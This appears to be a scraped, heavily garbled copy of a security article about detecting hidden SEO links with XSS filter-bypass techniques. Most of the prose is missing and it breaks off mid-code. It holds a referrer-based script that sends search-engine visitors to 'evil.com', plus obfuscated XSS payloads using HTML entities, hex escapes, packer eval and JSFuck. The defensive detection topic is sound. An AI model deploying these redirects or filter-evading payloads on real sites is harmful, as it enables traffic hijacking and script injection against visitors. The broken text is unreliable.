[16351] 2021-01-22_Front-End Matters: Insights from XSS Filter Bypasses for Automated Hidden-Link Detection

Document creator: s7ckTeam
Views: 1
Last updated: 2025-01-18
XSS FreeBuf 2021-01-22

bypass XSS idea JS document.referrer: HTTP Header referer js Request.Headers[Referer] js js document.referrer google ads CNZZ js url title title fofa

0x00 html xss 10 unicode title xss HTML xss <script> html javascript XSS javascript:alert(Helloworld!) 10 unicode title 10 Unicode

0x01 16 JS XSS XSS 16 16 window baidu js open 16 JavaScript eval js eval(function(p,a,c,k,e,d) | eval

<script> if(document.referrer.indexOf("baidu.com")>0){ location.href="http://evil.com"; } </script>

<img onmouseover='javascript:alert("Hello world!")' src="xxxx">

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert("Hello world!")

<title>/title> <title>&#x8FD9;&#x662F;&#x4E00;&#x884C;&#x6F14;&#x793A;&#x4EE3;&#x7801;</title> title

<script type = "text/javascript">window["open"]("\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d")</script>

16 JS JS eval() JS bypass

0x02 JSfuck XSS JSfuck JSFuck 6 !+ JavaScript JSFuck alert(1) JSfuck http://www.jsfuck.com/ 16 JS+eval JSFuck XSS XSS 1. 10 unicode 2. eval js 3. JSFuck XSS

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[[][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[
